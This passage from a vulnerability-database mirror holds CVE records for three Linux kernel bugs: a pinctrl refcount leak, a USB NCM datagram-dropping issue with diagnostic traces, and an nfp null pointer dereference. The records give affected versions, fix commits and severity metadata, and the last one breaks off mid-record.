Version: a988dcd3dd9e691c5ccc3324b209688f3b5453e9 Version: 040f726fecd88121f3b95e70369785ad452dddf9 Version: 777430aa4ddccaa5accec6db90ffc1d47f00d471 Version: 97e5b508e96176f1a73888ed89df396d7041bfcb Version: 91d5c5060ee24fe8da88cd585bb43b843d2f0dce Version: 91d5c5060ee24fe8da88cd585bb43b843d2f0dce Version: 91d5c5060ee24fe8da88cd585bb43b843d2f0dce Version: 91d5c5060ee24fe8da88cd585bb43b843d2f0dce Version: aaf552c5d53abe4659176e099575fe870d2e4768 Version: b4d9f55cd38435358bc16d580612bc0d798d7b4c Version: 5834a3a98cd266ad35a229923c0adbd0addc8d68 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.512Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06780473cb8a858d1d6cab2673e021b072a852d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47d253c485491caaf70d8cd8c0248ae26e42581f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35ab679e8bb5a81a4f922d3efbd43e32bce69274"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76aa2440deb9a35507590f2c981a69a57ecd305d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/518d5ddafeb084d6d9b1773ed85164300037d0e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/026e24cf31733dbd97f41cc9bc5273ace428eeec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7e02ccc9fdc496fe51e440e3e66ac36509ca049"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0cedbcc8852d6c77b00634b81e41f17f29d9404"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36959",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:15:35.448800Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:59.187Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/devicetree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "06780473cb8a858d1d6cab2673e021b072a852d1",
"status": "affected",
"version": "a988dcd3dd9e691c5ccc3324b209688f3b5453e9",
"versionType": "git"
},
{
"lessThan": "47d253c485491caaf70d8cd8c0248ae26e42581f",
"status": "affected",
"version": "040f726fecd88121f3b95e70369785ad452dddf9",
"versionType": "git"
},
{
"lessThan": "35ab679e8bb5a81a4f922d3efbd43e32bce69274",
"status": "affected",
"version": "777430aa4ddccaa5accec6db90ffc1d47f00d471",
"versionType": "git"
},
{
"lessThan": "76aa2440deb9a35507590f2c981a69a57ecd305d",
"status": "affected",
"version": "97e5b508e96176f1a73888ed89df396d7041bfcb",
"versionType": "git"
},
{
"lessThan": "518d5ddafeb084d6d9b1773ed85164300037d0e6",
"status": "affected",
"version": "91d5c5060ee24fe8da88cd585bb43b843d2f0dce",
"versionType": "git"
},
{
"lessThan": "026e24cf31733dbd97f41cc9bc5273ace428eeec",
"status": "affected",
"version": "91d5c5060ee24fe8da88cd585bb43b843d2f0dce",
"versionType": "git"
},
{
"lessThan": "c7e02ccc9fdc496fe51e440e3e66ac36509ca049",
"status": "affected",
"version": "91d5c5060ee24fe8da88cd585bb43b843d2f0dce",
"versionType": "git"
},
{
"lessThan": "a0cedbcc8852d6c77b00634b81e41f17f29d9404",
"status": "affected",
"version": "91d5c5060ee24fe8da88cd585bb43b843d2f0dce",
"versionType": "git"
},
{
"status": "affected",
"version": "aaf552c5d53abe4659176e099575fe870d2e4768",
"versionType": "git"
},
{
"status": "affected",
"version": "b4d9f55cd38435358bc16d580612bc0d798d7b4c",
"versionType": "git"
},
{
"status": "affected",
"version": "5834a3a98cd266ad35a229923c0adbd0addc8d68",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/devicetree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.19.267",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "5.4.225",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10.156",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.15.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.334",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.300",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: devicetree: fix refcount leak in pinctrl_dt_to_map()\n\nIf we fail to allocate propname buffer, we need to drop the reference\ncount we just took. Because the pinctrl_dt_free_maps() includes the\ndroping operation, here we call it directly."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:35.782Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/06780473cb8a858d1d6cab2673e021b072a852d1"
},
{
"url": "https://git.kernel.org/stable/c/47d253c485491caaf70d8cd8c0248ae26e42581f"
},
{
"url": "https://git.kernel.org/stable/c/35ab679e8bb5a81a4f922d3efbd43e32bce69274"
},
{
"url": "https://git.kernel.org/stable/c/76aa2440deb9a35507590f2c981a69a57ecd305d"
},
{
"url": "https://git.kernel.org/stable/c/518d5ddafeb084d6d9b1773ed85164300037d0e6"
},
{
"url": "https://git.kernel.org/stable/c/026e24cf31733dbd97f41cc9bc5273ace428eeec"
},
{
"url": "https://git.kernel.org/stable/c/c7e02ccc9fdc496fe51e440e3e66ac36509ca049"
},
{
"url": "https://git.kernel.org/stable/c/a0cedbcc8852d6c77b00634b81e41f17f29d9404"
}
],
"title": "pinctrl: devicetree: fix refcount leak in pinctrl_dt_to_map()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36959",
"datePublished": "2024-05-30T15:35:51.624Z",
"dateReserved": "2024-05-30T15:25:07.080Z",
"dateUpdated": "2025-05-04T12:56:35.782Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27405 (GCVE-0-2024-27405)
Vulnerability from cvelistv5
Published
2024-05-17 11:40
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs
It is observed sometimes when tethering is used over NCM with Windows 11
as host, at some instances, the gadget_giveback has one byte appended at
the end of a proper NTB. When the NTB is parsed, unwrap call looks for
any leftover bytes in SKB provided by u_ether and if there are any pending
bytes, it treats them as a separate NTB and parses it. But in case the
second NTB (as per unwrap call) is faulty/corrupt, all the datagrams that
were parsed properly in the first NTB and saved in rx_list are dropped.
Adding a few custom traces showed the following:
[002] d..1 7828.532866: dwc3_gadget_giveback: ep1out:
req 000000003868811a length 1025/16384 zsI ==> 0
[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025
[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342
[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67
[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400
[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10
[002] d..1 7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 frames
In this case, the giveback is of 1025 bytes and block length is 1024.
The rest 1 byte (which is 0x00) won't be parsed resulting in drop of
all datagrams in rx_list.
Same is case with packets of size 2048:
[002] d..1 7828.557948: dwc3_gadget_giveback: ep1out:
req 0000000011dfd96e length 2049/16384 zsI ==> 0
[002] d..1 7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342
[002] d..1 7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800
Lecroy shows one byte coming in extra confirming that the byte is coming
in from PC:
Transfer 2959 - Bytes Transferred(1025) Timestamp((18.524 843 590)
- Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590)
--- Packet 4063861
Data(1024 bytes)
Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590)
--- Packet 4063863
Data(1 byte)
Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722)
According to Windows driver, no ZLP is needed if wBlockLength is non-zero,
because the non-zero wBlockLength has already told the function side the
size of transfer to be expected. However, there are in-market NCM devices
that rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize.
To deal with such devices, it pads an extra 0 at end so the transfer is no
longer multiple of wMaxPacketSize.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c Version: 9f6ce4240a2bf456402c15c06768059e5973f28c |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "9f6ce4240a2b"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.38"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "0"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "4.19.308"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.4.270"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.10.211"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.15.150"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.1.80"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.6.19"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.7.7"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27405",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-28T16:38:04.984999Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-28T16:38:24.854Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.278Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/059285e04ebb273d32323fbad5431c5b94f77e48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a31cf46d108dabce3df80b3e5c07661e24912151"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57ca0e16f393bb21d69734e536e383a3a4c665fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2cb66b62a5d64ccf09b0591ab86fb085fa491fc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35b604a37ec70d68b19dafd10bbacf1db505c9ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b7ec68869d50ea998908af43b643bca7e54577e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7f43900bc723203d7554d299a2ce844054fab8e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76c51146820c5dac629f21deafab0a7039bc3ccd"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "059285e04ebb273d32323fbad5431c5b94f77e48",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "a31cf46d108dabce3df80b3e5c07661e24912151",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "57ca0e16f393bb21d69734e536e383a3a4c665fd",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "2cb66b62a5d64ccf09b0591ab86fb085fa491fc5",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "35b604a37ec70d68b19dafd10bbacf1db505c9ca",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "2b7ec68869d50ea998908af43b643bca7e54577e",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "c7f43900bc723203d7554d299a2ce844054fab8e",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
},
{
"lessThan": "76c51146820c5dac629f21deafab0a7039bc3ccd",
"status": "affected",
"version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.38"
},
{
"lessThan": "2.6.38",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs\n\nIt is observed sometimes when tethering is used over NCM with Windows 11\nas host, at some instances, the gadget_giveback has one byte appended at\nthe end of a proper NTB. When the NTB is parsed, unwrap call looks for\nany leftover bytes in SKB provided by u_ether and if there are any pending\nbytes, it treats them as a separate NTB and parses it. But in case the\nsecond NTB (as per unwrap call) is faulty/corrupt, all the datagrams that\nwere parsed properly in the first NTB and saved in rx_list are dropped.\n\nAdding a few custom traces showed the following:\n[002] d..1 7828.532866: dwc3_gadget_giveback: ep1out:\nreq 000000003868811a length 1025/16384 zsI ==\u003e 0\n[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025\n[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342\n[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67\n[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400\n[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10\n[002] d..1 7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 frames\n\nIn this case, the giveback is of 1025 bytes and block length is 1024.\nThe rest 1 byte (which is 0x00) won\u0027t be parsed resulting in drop of\nall datagrams in rx_list.\n\nSame is case with packets of size 2048:\n[002] d..1 7828.557948: dwc3_gadget_giveback: ep1out:\nreq 0000000011dfd96e length 2049/16384 zsI ==\u003e 0\n[002] d..1 7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342\n[002] d..1 7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800\n\nLecroy shows one byte coming in extra confirming that the byte is coming\nin from PC:\n\n Transfer 2959 - Bytes Transferred(1025) Timestamp((18.524 843 590)\n - Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590)\n --- Packet 4063861\n Data(1024 bytes)\n Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590)\n --- Packet 4063863\n Data(1 byte)\n Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722)\n\nAccording to Windows driver, no ZLP is needed if wBlockLength is non-zero,\nbecause the non-zero wBlockLength has already told the function side the\nsize of transfer to be expected. However, there are in-market NCM devices\nthat rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize.\nTo deal with such devices, it pads an extra 0 at end so the transfer is no\nlonger multiple of wMaxPacketSize."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:24.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/059285e04ebb273d32323fbad5431c5b94f77e48"
},
{
"url": "https://git.kernel.org/stable/c/a31cf46d108dabce3df80b3e5c07661e24912151"
},
{
"url": "https://git.kernel.org/stable/c/57ca0e16f393bb21d69734e536e383a3a4c665fd"
},
{
"url": "https://git.kernel.org/stable/c/2cb66b62a5d64ccf09b0591ab86fb085fa491fc5"
},
{
"url": "https://git.kernel.org/stable/c/35b604a37ec70d68b19dafd10bbacf1db505c9ca"
},
{
"url": "https://git.kernel.org/stable/c/2b7ec68869d50ea998908af43b643bca7e54577e"
},
{
"url": "https://git.kernel.org/stable/c/c7f43900bc723203d7554d299a2ce844054fab8e"
},
{
"url": "https://git.kernel.org/stable/c/76c51146820c5dac629f21deafab0a7039bc3ccd"
}
],
"title": "usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27405",
"datePublished": "2024-05-17T11:40:25.069Z",
"dateReserved": "2024-02-25T13:47:42.681Z",
"dateUpdated": "2025-05-04T09:04:24.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27046 (GCVE-0-2024-27046)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfp: flower: handle acti_netdevs allocation failure
The kmalloc_array() in nfp_fl_lag_do_work() will return null, if
the physical memory has run out. As a result, if we dereference
the acti_netdevs, the null pointer dereference bugs will happen.
This patch adds a check to judge whether allocation failure occurs.
If it happens, the delayed work will be rescheduled and try again.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f Version: bb9a8d031140f186d13d82f57b0f5646d596652f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27046",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:40:11.581706Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:45:28.272Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.990Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d746889db75a76aeee95fb705b8e1ac28c684a2e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b1e8a617eb0f4cdc19def530047a95b5abde07d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/928705e341010dd910fdece61ccb974f494a758f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d387dc503f9a53e6d1f6e9dd0292d38f083eba5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c9b4e220dd18f79507803f38a55d53b483f6c9c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/408ba7fd04f959c61b50db79c983484312fea642"
},
{
